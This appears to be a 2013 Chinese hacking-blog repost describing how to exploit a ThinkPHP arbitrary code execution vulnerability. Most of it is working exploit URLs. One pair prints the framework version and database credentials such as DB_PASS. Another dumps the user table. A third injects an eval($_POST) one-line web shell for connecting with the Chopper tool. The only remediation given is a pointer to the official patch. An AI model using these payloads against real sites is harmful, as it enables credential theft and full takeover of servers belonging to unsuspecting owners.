记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Thinkphp框架任意代码执行漏洞利用

2013-03-08 21:57

ThinkPHP是一款国内使用比较广泛的老牌PHP MVC框架,有不少创业公司或者项目都用了这个框架(目前我们公司所有项目都是TP的),ThinkPHP不正确过滤用户提交的参数,远程攻击者可以利用漏洞以应用程序上下文执行任意PHP代码。
最近thinkphp框架爆出了一个任意代码执行漏洞,其威胁程序相当的高,漏洞利用方法如下:
 
1. 使用URL可以查看用户的数据库帐号密码DB_NAME,DB_PASS,DB_HOST

http://site/index.php/module/action/param1/${@print(THINK_VERSION)}

http://site/index.php/module/action/param1/${@print(C(‘’))}

http://site/index.php/module/action/param1/${@print(C(‘DB_PASS’))}

 
 
2.使用模型D方法或者M方法,猜测后台帐号密码,当然首先要先猜一下用户的表名了

http://www.site.com/eetodaycom/index.php/Product/show/id/25/parm1/${@var_dump(D(user)->select())}

 
 
3.直接执行一句话代码,然后用菜刀直接连接.
http://site/index.php/module/action/param1/{${eval($_POST[s])}}          一句话密码:s
 
 
注:修复方法请关注官方!官方已出补丁包!
 
 

知识来源: www.opsers.com/loophole_directory/thinkphp-framework-for-arbitrary-code-execution-exploit-and

阅读:833660 | 评论:0 | 标签:漏洞目录

想收藏或者和大家分享这篇好文章→复制链接地址

“Thinkphp框架任意代码执行漏洞利用”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云